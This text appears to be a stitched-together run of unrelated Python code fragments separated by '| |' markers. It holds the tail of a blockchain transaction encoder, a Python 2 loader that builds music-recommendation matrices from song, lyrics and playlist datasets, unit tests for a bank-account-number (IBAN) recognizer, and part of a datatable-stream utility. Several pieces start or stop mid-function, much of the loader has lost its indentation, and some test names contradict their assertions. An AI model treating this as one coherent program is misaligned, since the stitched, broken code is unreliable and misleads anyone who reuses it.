for bs_input in self._blockstakes_inputs:
buffer.extend(binary.encode(bs_input.parent_id, type_='hex'))
# encode blockstake outputs
buffer.extend(binary.encode(self._blockstakes_outputs, type_='slice'))
# encode miner fees
buffer.extend(binary.encode(len(self._minerfees)))
for miner_fee in self._minerfees:
buffer.extend(binary.encode(miner_fee, type_='currency'))
# encode custom data_
buffer.extend(binary.encode(self._data, type_='slice'))
# now we need to return the hash value of the binary array
# return bytes(buffer)
return hash(data=buffer)
class TransactionV128:
| |
x[2:]), elements)
processed_pairs = imap(lambda x: (x[0], dict(
imap(lambda x: list(imap(int, x.split(u":"))), x[1]))), pairs)
tid_lyric_pairs_train = list(processed_pairs)
f = open(u"/data/jeffrey82221/MSD_Lyrics/mxm_dataset_test.txt")
lines = ifilter(lambda x: x[0] != u'#' and x[0] != u'%', f)
elements = imap(lambda x: x.replace(u"\n", u"").split(u","), lines)
pairs = imap(lambda x: (x[0], x[2:]), elements)
processed_pairs = imap(lambda x: (x[0], dict(
imap(lambda x: list(imap(int, x.split(u":"))), x[1]))), pairs)
tid_lyric_pairs_test = list(processed_pairs)
tid_lyric_pairs = tid_lyric_pairs_train + tid_lyric_pairs_test
f = open("/data/jeffrey82221/MSD_Lyrics/mxm_dataset_test.txt")
self.word_list = next(it.islice(f, 17, None)).split(',')
self.word_list[0] = 'i'
self.tid_list = map(lambda x: x[0], tid_lyric_pairs)
print "Lyrics Info LOAD"
# add tid_list and word_list into graph
# build sparse matrix base on this tid to word count dict
# add vertices
self.G = Graph()
self.G.add_vertices(len(self.tid_list + self.word_list))
self.G.vs['name'] = self.tid_list + self.word_list
# add edge:
name_id_matcher = dict(
zip(self.tid_list + self.word_list, range(len(self.tid_list + self.word_list))))
def song_word_edgelist_generator(tid_lyric_pairs):
for song_id in range(len(tid_lyric_pairs)):
for word_id, term_frequency in tid_lyric_pairs[song_id][1].items():
yield tid_lyric_pairs[song_id][0], self.word_list[word_id - 1], term_frequency
edgelist_generator = song_word_edgelist_generator(tid_lyric_pairs)
graph_edgelist_generator = imap(lambda x: (
name_id_matcher[x[0]], name_id_matcher[x[1]]), edgelist_generator) # match tids and word_list to number
self.G.add_edges(list(graph_edgelist_generator))
# add weights to edges :
self.G.es['weight'] = list(
imap(lambda x: x[2], song_word_edgelist_generator(tid_lyric_pairs)))
print "Graph Build"
'''
def load_lyrics_info(self, fix_tid_list):
f = open(u"/data/jeffrey82221/MSD_Lyrics/mxm_dataset_train.txt")
lines = ifilter(lambda x: x[0] != u'#' and x[0] != u'%', f)
elements = imap(lambda x: x.replace(u"\n", u"").split(u","), lines)
pairs = imap(lambda x: (x[0], x[2:]), elements)
tid_lyric_pairs_train = imap(lambda x: (x[0], dict(
imap(lambda x: list(imap(int, x.split(u":"))), x[1]))), pairs)
#tid_lyric_pairs_train = list(processed_pairs)
f = open(u"/data/jeffrey82221/MSD_Lyrics/mxm_dataset_test.txt")
lines = ifilter(lambda x: x[0] != u'#' and x[0] != u'%', f)
elements = imap(lambda x: x.replace(u"\n", u"").split(u","), lines)
pairs = imap(lambda x: (x[0], x[2:]), elements)
tid_lyric_pairs_test = imap(lambda x: (x[0], dict(
imap(lambda x: list(imap(int, x.split(u":"))), x[1]))), pairs)
#tid_lyric_pairs_test = list(processed_pairs)
tid_lyric_pairs = it.chain(tid_lyric_pairs_train, tid_lyric_pairs_test)
tid_lyric_table = pd.DataFrame.from_records(
tid_lyric_pairs, columns=['tid', 'lyrics'])
tid_lyric_table = tid_lyric_table.set_index('tid')
print "tid lyric info load"
if fix_tid_list != None:
tid_lyric_table = tid_lyric_table.loc[fix_tid_list]
print "FIX TID DONE"
print u"lyrics file load"
tid_lyric_pairs_left, tid_lyric_pairs_right = it.tee(
tid_lyric_table.reset_index("tid").itertuples(index=False))
lyrics = imap(lambda x: x[1], tid_lyric_pairs_right)
lyric_id_list = imap(lambda x: list(
it.chain(*list(imap(lambda k_v: [k_v[0]] * k_v[1], x.items())))), lyrics)
tfidf_vectorizer = TfidfVectorizer(ngram_range=(
1, 1), preprocessor=lambda x: x, tokenizer=lambda x: x)
self.matrix = tfidf_vectorizer.fit_transform(
lyric_id_list) # user word matrix
if reduced_dimension != None:
self.matrix = self.Dimension_Reduction(
self.matrix, reduced_dimension)
self.tid_list = list(imap(lambda x: x[0], tid_lyric_pairs_left))
self.tid_song_id_table = pd.DataFrame(
[(v, i) for i, v in enumerate(self.tid_list)], columns=['tid', 'id'])
self.tid_song_id_table = self.tid_song_id_table.set_index('tid')
print u"lyrics tfidf matrix build"
# 1. tid_song_id_table
# 2. tid_list
'''
    def load_listen_network(self):
        # Build the listening graph from the MSD taste-profile triplets and
        # relabel its song vertices from Echo Nest ids to MSD track ids.
        # (Python 2 code: uses print statements and itertools.imap.)
        self.G = Graph.Read_Ncol(
            "/data/jeffrey82221/MSD_Taste/train_triplets.txt", names=True, directed=False, weights=True)
        # rematch names to tids
        print "Graph LOAD"
        f = open("/data/jeffrey82221/MSD_Taste/unique_tracks.txt")
        # Each line is tid<SEP>echoid<SEP>artist<SEP>title.
        elements = imap(lambda x: x.replace("\n", "").split("<SEP>"), f)
        track_id_table = pd.DataFrame.from_records(
            elements, columns=[u'tid', u'echoid', u'artist', u'title'])
        track_id_table = track_id_table.set_index('echoid')
        node_names = self.G.vs['name']
        # Song vertices are the ones whose name starts with 'S' (Echo Nest
        # song ids); keep (vertex_index, name) pairs for the relabel below.
        tmp_tid_list = filter(lambda x: x[1][0] == 'S', enumerate(node_names))
        self.tid_list = list(
            track_id_table.loc[map(lambda x:x[1], tmp_tid_list)].tid)
        # Overwrite the matched vertices' names with the MSD track ids.
        self.G.vs[map(lambda x:x[0], tmp_tid_list)]['name']=self.tid_list
        print "Graph Track id Replaced"
'''
def load_listen_info(self, fix_tid_list):
f = open(u"/data/jeffrey82221/MSD_Taste/unique_tracks.txt")
elements = imap(lambda x: x.replace(u"\n", u"").split(u"<SEP>"), f)
track_id_table = pd.DataFrame.from_records(
elements, columns=[u'tid', u'echoid', u'artist', u'title'])
print "track info load"
f = open(u"/data/jeffrey82221/MSD_Taste/train_triplets.txt")
listening_log_table = pd.read_csv(
u"/data/jeffrey82221/MSD_Taste/train_triplets.txt", sep=u"\t", header=None)
listening_log_table.columns = [u'user', u'echoid', u'count']
listening_log_table = listening_log_table.merge(
track_id_table, on='echoid') # match tid to echo id , (an echoid can have multiple tids) => user ~ echoid ~ count => user ~ echoid ~ tids ~ count =>
# reduce using tids
print "listening log load"
if fix_tid_list != None:
listening_log_table = listening_log_table.set_index(
'tid').loc[fix_tid_list].reset_index('tid')
print "FIX TID DONE"
self.tid_list = list(set(listening_log_table.tid))
user_list = list(set(listening_log_table.user))
self.tid_song_id_table = pd.DataFrame( # match to number id
[(v, i) for i, v in enumerate(self.tid_list)], columns=['tid', 'id'])
listening_log_table = listening_log_table.merge(
self.tid_song_id_table, on='tid') # merge number id ~ tid to listening log table
self.tid_song_id_table = self.tid_song_id_table.set_index('tid')
listening_log_table = listening_log_table.merge(pd.DataFrame(
list(enumerate(user_list)), columns=['user_id', 'user']), on='user')
self.matrix = scipy.sparse.csr_matrix((np.array(
listening_log_table[u'count']), (listening_log_table[u'id'], listening_log_table[u'user_id'])))
if reduced_dimension != None:
self.matrix = self.Dimension_Reduction(
self.matrix, reduced_dimension)
print 'finished processing dimension reduction'
print u"user tid matrix build"
def load_playlist_song_info(self, fix_tid_list):
if self.playlist_source == 'yes':
num_lines = sum(1 for line in open(
u'/data/jeffrey82221/YES/song_hash.txt'))
f = open(u'/data/jeffrey82221/YES/song_hash.txt', u'rt')
splitted = csv.reader(f, delimiter='\t', quotechar='|')
def remove_parenthese(string):
return re.sub(ur'\([^)]*\)', u'', string).strip()
name_matcher = imap(lambda x: (
int(x[0].strip()), (remove_parenthese(x[1]), remove_parenthese(x[2]))), splitted)
# playlist matching
playlist_key, name_matcher_ = it.tee(name_matcher)
name_table = pd.DataFrame(
list(name_matcher), columns=['song_id', 'name'])
print "playlist info LOAD"
f = open("/data/jeffrey82221/MSD_Taste/unique_tracks.txt")
elements = imap(lambda x: x.replace("\n", "").split("<SEP>"), f)
track_id_table = pd.DataFrame.from_records(
elements, columns=[u'tid', u'echoid', u'artist', u'title'])
track_id_table['name'] = zip(
track_id_table['title'], track_id_table['artist'])
print "track_id_table info LOAD"
# a yes.com id may match to multiple tid , random choose one !
matched_table = track_id_table.merge(name_table, on='name', how='inner')[
['tid', 'song_id']]
id_nid_dict = dict()
for i, id in enumerate(matched_table.song_id):
if id in id_nid_dict:
id_nid_dict[id].append(i)
else:
id_nid_dict[id] = [i]
nids = map(lambda x: random.choice(x[1]), id_nid_dict.items())
self.tid_song_id_table = matched_table.iloc[nids]
self.tid_song_id_table = self.tid_song_id_table.set_index('tid')
elif self.playlist_source == 'aotm':
# tid_song_id_dict :::
# load unique song table (track info table )
# load the important from neighbor_dict keys
# match to tids
f = open("/data/jeffrey82221/MSD_Taste/unique_tracks.txt")
elements = imap(lambda x: x.replace("\n", "").split("<SEP>"), f)
track_info_table = pd.DataFrame.from_records(
elements, columns=[u'tid', u'echoid', u'artist', u'title'])
track_info_table = track_info_table.set_index("echoid")
try:
f = open(u"playlist_song_ids", u"r")
playlist_song_ids = json.loads(f.read())
f.close()
except:
f = open(
'/data/jeffrey82221/playlist_aotm/aotm2011_playlists.json')
playlist_generator = imap(lambda x: list(
it.chain(*x)), ijson.items(f, "item.filtered_lists"))
playlist_generator = Count_Class(
playlist_generator, 10000, 'playlist').passing()
playlist_song_ids = list(
set(list(it.chain.from_iterable(playlist_generator))))
f = open(u"playlist_song_ids", u"w")
f.write(json.dumps(playlist_song_ids, ensure_ascii=False))
f.close()
self.tid_song_id_table = track_info_table.loc[playlist_song_ids][[
'tid']]
self.tid_song_id_table = self.tid_song_id_table.reset_index(
'echoid').set_index('tid')
self.tid_song_id_table.columns = ['song_id']
if fix_tid_list != None:
self.tid_song_id_table = self.tid_song_id_table.loc[fix_tid_list]
self.song_id_tid_table = self.tid_song_id_table.reset_index(
'tid').set_index('song_id')
# reduce the possibility that a song_id may match to multiple tid
self.tid_list = list(self.tid_song_id_table.index)
song_id_list = list(self.song_id_tid_table.index)
song_id_set = list(set(song_id_list))
nid_list = map(lambda id: song_id_list.index(id), song_id_set)
self.song_id_tid_table = self.song_id_tid_table.iloc[nid_list]
def load_playlist_info(self, fix_tid_list):
self.load_playlist_song_info(fix_tid_list)
# playlist song count : 119894
# if save neighbor dict : playlist source dependent and fix_tid_list dependent !
# imap filter out the irrelevent element in array
try:
if fix_tid_list != None:
f = open(self.playlist_source +
str(len(fix_tid_list)) + ".neighbor_dict", u"r")
neighbor_dict = json.loads(f.read())
f.close()
else:
f = open(self.playlist_source + ".neighbor_dict", u"r")
neighbor_dict = json.loads(f.read())
f.close()
print u"neighbor_dict LOAD"
except:
if self.playlist_source == "yes":
playlist_file = open(u'/data/jeffrey82221/YES/train.txt')
playlists_train = it.islice(
imap(lambda x: list(imap(int, x.split(u' ')[:-1])), playlist_file), 2, None)
playlist_file = open(u'/data/jeffrey82221/YES/test.txt')
playlists_test = it.islice(
imap(lambda x: list(imap(int, x.split(u' ')[:-1])), playlist_file), 2, None)
playlists = it.chain(playlists_train, playlists_test)
# remove not matchable songs from playlist
# remove
elif self.playlist_source == "aotm":
f = open(
'/data/jeffrey82221/playlist_aotm/aotm2011_playlists.json')
#playlist_generator = ijson.items(f, "item")
playlists = imap(lambda x: list(it.chain(*x)),
ijson.items(f, "item.filtered_lists"))
#playlists = cleaned_playlist_generator(playlist_generator)
if fix_tid_list != None:
fix_song_id_list = list(
self.tid_song_id_table.loc[fix_tid_list].song_id)
p = multiprocessing.Pool()
playlists = ifilter(lambda x: len(x) > 0, p.imap_unordered(
partial(filtering, fix_song_id_list=fix_song_id_list), playlists))
playlists = Count_Class(playlists, 100, 'playlist').passing()
# the begining song of itself should remain in the neighbor list
def neighbor_pair_generator(playlist):
for i in xrange(len(playlist)):
left = playlist[:i][::-1]
right = playlist[i + 1:]
if len(left) != 0 and len(right) != 0:
yield [playlist[i], [left, right]]
elif len(left) == 0:
yield [playlist[i], [right]]
elif len(right) == 0:
yield [playlist[i], [left]]
neighbor_pairs = it.chain.from_iterable(
imap(neighbor_pair_generator, playlists))
def clean_neighbor_pair(input):
return input[0], filter(lambda x: len(x) != 0, input[1])
neighbor_pairs = ifilter(lambda x: len(x[1]) > 0, imap(
clean_neighbor_pair, neighbor_pairs)) # the pair with song occur alone in the playlist after filtering is also filter out ! (they should be remain in the list)
neighbor_dict = dict()
for neighbor_pair in neighbor_pairs:
if neighbor_pair[0] in neighbor_dict:
neighbor_dict[neighbor_pair[0]].extend(neighbor_pair[1])
else:
neighbor_dict[neighbor_pair[0]] = neighbor_pair[1]
if fix_tid_list != None:
f = open(self.playlist_source +
str(len(fix_tid_list)) + ".neighbor_dict", u"w")
f.write(json.dumps(neighbor_dict, ensure_ascii=False))
f.close()
else:
f = open(self.playlist_source + ".neighbor_dict", u"w")
f.write(json.dumps(neighbor_dict, ensure_ascii=False))
f.close()
print u"neighbor_dict BUILD and SAVE"
self.neighbor_table = pd.DataFrame(neighbor_dict.items(), columns=[
'song_id', 'neighbor_list'])
self.neighbor_table = self.neighbor_table.set_index('song_id')
def random_select_an_id_from_list(self, input_id_list, weights=None, labeled_id_list=None):
# print type(input_id_list),len(input_id_list),type(weights),len(weights),type(labeled_id_list)
# print input_id_list
if type(input_id_list) == list or type(input_id_list) == np.ndarray:
if len(input_id_list) != 0:
if type(labeled_id_list) != type(None):
if type(weights) != type(None):
id_list_weight_pairs = filter(
lambda x: x[0] in labeled_id_list, zip(input_id_list, weights))
filtered_id_list = map(
lambda x: x[0], id_list_weight_pairs)
filtered_weights = map(
lambda x: x[1], id_list_weight_pairs)
else:
filtered_id_list = list(
set(labeled_id_list) & set(input_id_list))
filtered_weights = None
# filter with weights
if len(filtered_id_list) != | |
= 'LI21 0881 0000 2324 013A B'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Lithuania (16n) LTkk bbbb bccc cccc cccc
    def test_LT_iban_valid_no_spaces(self):
        # A well-formed Lithuanian IBAN (LTkk + 16 digits) with no separators
        # must be detected as one entity spanning all 20 characters.
        iban = 'LT121000011101001000'
        results = iban_recognizer.analyze(iban, entities)
        assert len(results) == 1
        assert_result(results[0], entities[0], 0, 20, EntityRecognizer.MAX_SCORE)
    def test_LT_iban_valid_with_spaces(self):
        # Same IBAN with group separators; the match spans 24 characters
        # because the spaces are part of the recognized text.
        iban = 'LT12 1000 0111 0100 1000'
        results = iban_recognizer.analyze(iban, entities)
        assert len(results) == 1
        assert_result(results[0], entities[0], 0, 24, EntityRecognizer.MAX_SCORE)
    def test_LT_iban_invalid_format_valid_checksum(self):
        # A letter in a digits-only position breaks the LT format, so even
        # after recomputing valid check digits no entity may be reported.
        iban = 'LT12 A000 0111 0100 1000'
        iban = update_iban_checksum(iban)
        results = iban_recognizer.analyze(iban, entities)
        assert len(results) == 0
    def test_LT_iban_valid_checksum(self):
        # NOTE(review): despite the name, the last digit differs from the
        # valid IBAN above, so the mod-97 check fails and nothing is detected.
        iban = 'LT12 1000 0111 0100 1001'
        results = iban_recognizer.analyze(iban, entities)
        assert len(results) == 0
# Luxembourg (3n,13c) LUkk bbbc cccc cccc cccc
def test_LU_iban_valid_no_spaces(self):
iban = 'LU280019400644750000'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 20, EntityRecognizer.MAX_SCORE)
def test_LU_iban_valid_with_spaces(self):
iban = 'LU28 0019 4006 4475 0000'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 24, EntityRecognizer.MAX_SCORE)
def test_LU_iban_invalid_format_valid_checksum(self):
iban = 'LU28 A019 4006 4475 0000'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_LU_iban_valid_checksum(self):
iban = 'LU28 0019 4006 4475 0001'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Malta (4a,5n,18c) MTkk bbbb ssss sccc cccc cccc cccc ccc
def test_MT_iban_valid_no_spaces(self):
iban = 'MT84MALT011000012345MTLCAST001S'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 31, EntityRecognizer.MAX_SCORE)
def test_MT_iban_valid_with_spaces(self):
iban = 'MT84 MALT 0110 0001 2345 MTLC AST0 01S'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 38, EntityRecognizer.MAX_SCORE)
def test_MT_iban_invalid_format_valid_checksum(self):
iban = 'MT84 MALT A110 0001 2345 MTLC AST0 01S'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_MT_iban_valid_checksum(self):
iban = 'MT84 MALT 0110 0001 2345 MTLC AST0 01T'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Mauritania (23n) MRkk bbbb bsss sscc cccc cccc cxx
def test_MR_iban_valid_no_spaces(self):
iban = 'MR1300020001010000123456753'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 27, EntityRecognizer.MAX_SCORE)
def test_MR_iban_valid_with_spaces(self):
iban = 'MR13 0002 0001 0100 0012 3456 753'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 33, EntityRecognizer.MAX_SCORE)
def test_MR_iban_invalid_format_valid_checksum(self):
iban = 'MR13 A002 0001 0100 0012 3456 753'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_MR_iban_valid_checksum(self):
iban = 'MR13 0002 0001 0100 0012 3456 754'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Mauritius (4a,19n,3a) MUkk bbbb bbss cccc cccc cccc 000m mm
def test_MU_iban_valid_no_spaces(self):
iban = 'MU17BOMM0101101030300200000MUR'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 30, EntityRecognizer.MAX_SCORE)
def test_MU_iban_valid_with_spaces(self):
iban = 'MU17 BOMM 0101 1010 3030 0200 000M UR'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 37, EntityRecognizer.MAX_SCORE)
def test_MU_iban_invalid_format_valid_checksum(self):
iban = 'MU17 BOMM A101 1010 3030 0200 000M UR'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_MU_iban_valid_checksum(self):
iban = 'MU17 BOMM 0101 1010 3030 0200 000M US'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Moldova (2c,18c) MDkk bbcc cccc cccc cccc cccc
def test_MD_iban_valid_no_spaces(self):
iban = 'MD24AG000225100013104168'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 24, EntityRecognizer.MAX_SCORE)
def test_MD_iban_valid_with_spaces(self):
iban = 'MD24 AG00 0225 1000 1310 4168'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 29, EntityRecognizer.MAX_SCORE)
def test_MD_iban_invalid_format_valid_checksum(self):
iban = 'MD24 AG00 0225 1000 1310 4168 9'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_MD_iban_valid_checksum(self):
iban = 'MD24 AG00 0225 1000 1310 4169'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Monaco (10n,11c,2n) MCkk bbbb bsss sscc cccc cccc cxx
def test_MC_iban_valid_no_spaces(self):
iban = 'MC5811222000010123456789030'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 27, EntityRecognizer.MAX_SCORE)
def test_MC_iban_valid_with_spaces(self):
iban = 'MC58 1122 2000 0101 2345 6789 030'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 33, EntityRecognizer.MAX_SCORE)
def test_MC_iban_invalid_format_valid_checksum(self):
iban = 'MC58 A122 2000 0101 2345 6789 030'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_MC_iban_valid_checksum(self):
iban = 'MC58 1122 2000 0101 2345 6789 031'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Montenegro (18n) MEkk bbbc cccc cccc cccc xx
def test_ME_iban_valid_no_spaces(self):
iban = 'ME25505000012345678951'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 22, EntityRecognizer.MAX_SCORE)
def test_ME_iban_valid_with_spaces(self):
iban = 'ME25 5050 0001 2345 6789 51'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 27, EntityRecognizer.MAX_SCORE)
def test_ME_iban_invalid_format_valid_checksum(self):
iban = 'ME25 A050 0001 2345 6789 51'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_ME_iban_valid_checksum(self):
iban = 'ME25 5050 0001 2345 6789 52'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Netherlands (4a,10n) NLkk bbbb cccc cccc cc
    def test_NL_iban_valid_no_spaces(self):
        # A well-formed Dutch IBAN (NLkk + 4 letters + 10 digits) with no
        # separators must be detected as one 18-character entity.
        iban = 'NL91ABNA0417164300'
        results = iban_recognizer.analyze(iban, entities)
        assert len(results) == 1
        assert_result(results[0], entities[0], 0, 18, EntityRecognizer.MAX_SCORE)
    def test_NL_iban_valid_with_spaces(self):
        # Same IBAN with group separators; the match spans 22 characters
        # because the spaces are part of the recognized text.
        iban = 'NL91 ABNA 0417 1643 00'
        results = iban_recognizer.analyze(iban, entities)
        assert len(results) == 1
        assert_result(results[0], entities[0], 0, 22, EntityRecognizer.MAX_SCORE)
    def test_NL_iban_invalid_format_valid_checksum(self):
        # A digit in the letters-only bank-code position breaks the NL format,
        # so even with recomputed check digits no entity may be reported.
        iban = 'NL91 1BNA 0417 1643 00'
        iban = update_iban_checksum(iban)
        results = iban_recognizer.analyze(iban, entities)
        assert len(results) == 0
    def test_NL_iban_valid_checksum(self):
        # NOTE(review): despite the name, the last digit differs from the
        # valid IBAN above, so the mod-97 check fails and nothing is detected.
        iban = 'NL91 ABNA 0417 1643 01'
        results = iban_recognizer.analyze(iban, entities)
        assert len(results) == 0
# North Macedonia (3n,10c,2n) MKkk bbbc cccc cccc cxx
def test_MK_iban_valid_no_spaces(self):
iban = 'MK07250120000058984'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 19, EntityRecognizer.MAX_SCORE)
def test_MK_iban_valid_with_spaces(self):
iban = 'MK07 2501 2000 0058 984'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 23, EntityRecognizer.MAX_SCORE)
def test_MK_iban_invalid_format_valid_checksum(self):
iban = 'MK07 A501 2000 0058 984'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_MK_iban_valid_checksum(self):
iban = 'MK07 2501 2000 0058 985'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Norway (11n) NOkk bbbb cccc ccx
def test_NO_iban_valid_no_spaces(self):
iban = 'NO9386011117947'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 15, EntityRecognizer.MAX_SCORE)
def test_NO_iban_valid_with_spaces(self):
iban = 'NO93 8601 1117 947'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 18, EntityRecognizer.MAX_SCORE)
def test_NO_iban_invalid_format_valid_checksum(self):
iban = 'NO93 A601 1117 947'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_NO_iban_valid_checksum(self):
iban = 'NO93 8601 1117 948'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Pakistan (4c,16n) PKkk bbbb cccc cccc cccc cccc
def test_PK_iban_valid_no_spaces(self):
iban = 'PK36SCBL0000001123456702'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 24, EntityRecognizer.MAX_SCORE)
def test_PK_iban_valid_with_spaces(self):
iban = 'PK36 SCBL 0000 0011 2345 6702'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 29, EntityRecognizer.MAX_SCORE)
def test_PK_iban_invalid_format_valid_checksum(self):
iban = 'PK36 SCBL A000 0011 2345 6702'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_PK_iban_valid_checksum(self):
iban = 'PK36 SCBL 0000 0011 2345 6703'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Palestinian territories (4c,21n) PSkk bbbb xxxx xxxx xccc cccc cccc c
def test_PS_iban_valid_no_spaces(self):
iban = 'PS92PALS000000000400123456702'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 29, EntityRecognizer.MAX_SCORE)
def test_PS_iban_valid_with_spaces(self):
iban = 'PS92 PALS 0000 0000 0400 1234 5670 2'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 36, EntityRecognizer.MAX_SCORE)
def test_PS_iban_invalid_format_valid_checksum(self):
iban = 'PS92 PALS A000 0000 0400 1234 5670 2'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_PS_iban_valid_checksum(self):
iban = 'PS92 PALS 0000 0000 0400 1234 5670 3'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Poland (24n) PLkk bbbs sssx cccc cccc cccc cccc
def test_PL_iban_valid_no_spaces(self):
iban = 'PL61109010140000071219812874'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 28, EntityRecognizer.MAX_SCORE)
def test_PL_iban_valid_with_spaces(self):
iban = 'PL61 1090 1014 0000 0712 1981 2874'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 1
assert_result(results[0], entities[0], 0, 34, EntityRecognizer.MAX_SCORE)
def test_PL_iban_invalid_format_valid_checksum(self):
iban = 'PL61 A090 1014 0000 0712 1981 2874'
iban = update_iban_checksum(iban)
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
def test_PL_iban_valid_checksum(self):
iban = 'PL61 1090 1014 0000 0712 1981 2875'
results = iban_recognizer.analyze(iban, entities)
assert len(results) == 0
# Portugal (21n) PTkk bbbb | |
from collections import defaultdict, Counter
from datatable_util import AttributeDict, CSV_GivenHeaders, FIXEDWIDTH, JoinType, sortKey
from hierarchies import Hierarchy
import os
from datatable import DataTable, DataColumn
from itertools import chain
from functools import reduce
def createColumnFilter(criteria):
	'''Build a one-argument predicate that matches values against criteria.

	criteria may be None (match None), a callable (applied to the value),
	a DataColumnStream (membership in its materialized values), any
	non-string container (membership test), or a plain value (equality).
	'''
	if criteria is None:
		def matches(value):
			return value is None
	elif '__call__' in dir(criteria):
		def matches(value):
			return criteria(value)
	elif isinstance(criteria, DataColumnStream):
		# Materialize the column once so every test is a set lookup.
		snapshot = set(criteria)
		def matches(value):
			return value in snapshot
	elif '__contains__' in dir(criteria) and not isinstance(criteria, str):
		def matches(value):
			return value in criteria
	else:
		def matches(value):
			return value == criteria
	return matches
class KeyParamedDefaultDict(dict):
	'''dict that lazily fills in missing entries by calling defaultMethod(key).

	Like collections.defaultdict, except the factory receives the missing
	key, so the default value can depend on it.
	'''
	def __init__(self, defaultMethod, *args, **kwargs):
		super(KeyParamedDefaultDict, self).__init__(*args, **kwargs)
		# Factory invoked with the missing key to produce its value.
		self.defaultMethod = defaultMethod
	def __missing__(self, key):
		# dict.__getitem__ calls this hook only on a miss, so successful
		# lookups stay a single C-level operation instead of the previous
		# "key not in self" check plus a second lookup on every access.
		value = self.defaultMethod(key)
		self[key] = value
		return value
class DataColumnStream(object):
	'''Lazy view of a single column of a DataTableStream.

	Iterating yields this column's value for each row of the backing
	stream; most other operations are built on that iteration.
	'''
	def __init__(self, dataTableStream, header):
		self.__dataTableStream = dataTableStream
		# Accept another column (stream or materialized) as the header spec.
		if isinstance(header, (DataColumnStream, DataColumn)):
			self.header = header.header
		else:
			self.header = header
	def __iter__(self):
		# BUG FIX: this previously iterated self.__dataTable, an attribute
		# that is never assigned, so iteration always raised AttributeError.
		for row in self.__dataTableStream:
			yield row[self.header]
	def __getitem__(self, index):
		'''Gets the index'th row of data'''
		# Iterable or slice indices delegate to the table, then re-project
		# this column; a plain integer scans for the i'th value.
		if '__iter__' in dir(index) or isinstance(index, slice):
			return self.__dataTableStream[index].column(self.header)
		for i, v in enumerate(self):
			if i == index:
				return v
		return None
	def toList(self):
		return list(self)
	def first(self):
		# First value of the column, or None when the column is empty.
		for value in self:
			return value
		return None
	def reduce(self, reductionMethod, startingValue=None):
		# BUG FIX: the branches were swapped - a caller-supplied starting
		# value was ignored, while None was passed as the initializer when
		# no starting value was given.
		if startingValue is None:
			return reduce(reductionMethod, self)
		return reduce(reductionMethod, self, startingValue)
	def last(self):
		return self.reduce(lambda a, b: b)
	def max(self):
		return max(self)
	def min(self):
		return min(self)
	def filter(self, value):
		'''
		Filter the table by matching this column with the given value
		Value may be one of the following:
			None - returns rows where this column is None
